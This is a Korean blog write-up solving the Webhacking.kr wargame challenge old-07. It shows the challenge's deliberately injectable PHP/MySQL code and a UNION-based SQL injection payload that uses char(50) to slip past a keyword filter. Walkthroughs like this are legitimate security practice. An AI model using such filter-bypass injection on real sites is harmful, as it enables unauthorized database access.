write-up(web)/webhacking.kr

[Webhacking.kr] old-07

chanchand 2023. 2. 27. 16:06
반응형

문제

<?php
  include "../../config.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 7</title>
</head>
<body>
<?php
$go=$_GET['val'];
if(!$go) { echo("<meta http-equiv=refresh content=0;url=index.php?val=1>"); }
echo("<html><head><title>admin page</title></head><body bgcolor='black'><font size=2 color=gray><b><h3>Admin page</h3></b><p>");
if(preg_match("/2|-|\+|from|_|=|\\s|\*|\//i",$go)) exit("Access Denied!");
$db = dbconnect();
$rand=rand(1,5);
if($rand==1){
  $result=mysqli_query($db,"select lv from chall7 where lv=($go)") or die("nice try!");
}
if($rand==2){
  $result=mysqli_query($db,"select lv from chall7 where lv=(($go))") or die("nice try!");
}
if($rand==3){
  $result=mysqli_query($db,"select lv from chall7 where lv=((($go)))") or die("nice try!");
}
if($rand==4){
  $result=mysqli_query($db,"select lv from chall7 where lv=(((($go))))") or die("nice try!");
}
if($rand==5){
  $result=mysqli_query($db,"select lv from chall7 where lv=((((($go)))))") or die("nice try!");
}
$data=mysqli_fetch_array($result);
if(!$data[0]) { echo("query error"); exit(); }
if($data[0]==1){
  echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=\"alert('Access_Denied!')\"><p>");
}
elseif($data[0]==2){
  echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=\"alert('Hello admin')\"><p>");
  solve(7);
}
?>
<a href=./?view_source=1>view-source</a>
</body>
</html>

 

 

문제풀이

mysqli_query 결과가 2일때, 문제가 해결된다.

 

val 파라미터 입력값이 go 변수에 들어가고, 필터링 검사를 한 후, sql문에 들어간다.

$go=$_GET['val'];
if(!$go) { echo("<meta http-equiv=refresh content=0;url=index.php?val=1>"); }
echo("<html><head><title>admin page</title></head><body bgcolor='black'><font size=2 color=gray><b><h3>Admin page</h3></b><p>");
if(preg_match("/2|-|\+|from|_|=|\\s|\*|\//i",$go)) exit("Access Denied!");
select lv from chall7 where lv=($go)

 

파라미터를 통해 sql문을 조작할 수 있으며, 2는 필터링 되므로 char(50)을 이용한다.

/?val=0)union(select(char(50))
select lv from chall7 where lv=(0)union(select char(50))

 

rand(1,5) 으로 아래 쿼리문 중 하나가 실행된다.

$result=mysqli_query($db,"select lv from chall7 where lv=($go)") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=(($go))") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=((($go)))") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=(((($go))))") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=((((($go)))))") or die("nice try!");


여러번 시도하면 문제가 해결된다.

 
반응형
저작자표시 비영리 변경금지

'write-up(web) > webhacking.kr' 카테고리의 다른 글

[Webhacking.kr] RPG1  (0) 2023.09.21
[Webhacking.kr] old-08  (0) 2023.02.27
[Webhacking.kr] old-06  (0) 2023.02.19
[Webhacking.kr] old-05  (0) 2023.02.19
[Webhacking.kr] old-04  (0) 2023.02.19

'write-up(web)/webhacking.kr'의 다른글

  • 현재글[Webhacking.kr] old-07

티스토리툴바